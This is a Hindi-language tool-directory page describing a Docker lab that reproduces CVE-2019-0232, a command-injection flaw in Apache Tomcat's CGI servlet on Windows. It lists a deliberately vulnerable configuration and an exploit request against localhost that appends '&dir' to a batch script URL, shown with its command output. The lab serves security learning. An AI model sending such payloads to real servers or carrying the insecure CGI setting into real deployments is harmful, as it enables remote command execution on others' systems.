Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Preproduce-CVE-2019-0232 | Kitploit
उपकरण/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-0232 - Apache Tomcat CGI Servlet दूरस्थ कोड निष्पादन

यह रिपॉजिटरी Windows पर Apache Tomcat 9.0.17 में CVE-2019-0232 भेद्यता को दोहराने के लिए एक Docker-आधारित लैब वातावरण प्रदान करती है।

भेद्यता अवलोकन

CVE-2019-0232, Windows पर चलने पर Apache Tomcat CGI Servlet में एक दूरस्थ कोड निष्पादन भेद्यता है। यह समस्या कमांड-लाइन तर्कों के अनुचित प्रबंधन के कारण उत्पन्न होती है जब enableCmdLineArguments पैरामीटर true पर सेट होता है। एक हमलावर क्वेरी स्ट्रिंग के माध्यम से CGI स्क्रिप्ट में मनमाने तर्क पास कर सकता है, जिससे सिस्टम कमांड का निष्पादन होता है।

  • प्रभावित संस्करण: Apache Tomcat 9.0.0.M1 से 9.0.17
  • सुधारित संस्करण: 9.0.18 और उसके बाद के संस्करण
  • आवश्यक शर्तें:
    • Windows ऑपरेटिंग सिस्टम
    • CGI सर्वलेट कॉन्फ़िगरेशन में enableCmdLineArguments=true
    • CGI सर्वलेट सक्षम और URL पैटर्न से मैप किया हुआ

लैब वातावरण

डायरेक्टरी संरचना

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (CGI configuration)
                    └── cgi-bin
                        └── test.bat      ← (.bat script)

कॉन्फ़िगरेशन फ़ाइलें

  • context.xml: वेब एप्लिकेशन को CGI सर्वलेट का उपयोग करने की अनुमति देने के लिए privileged="true" सेट करता है।
  • web.xml: CGI सर्वलेट को enableCmdLineArguments=true के साथ परिभाषित करता है और इसे /cgi-bin/* पर मैप करता है।
  • test.bat: एक सरल बैच स्क्रिप्ट जो एक स्वागत संदेश लौटाती है।

आरंभ करना

पूर्वापेक्षाएँ

  • Docker (Windows कंटेनर मोड)
  • Docker Compose

बिल्ड और रन

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

शोषण

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
टूल डाउनलोड करें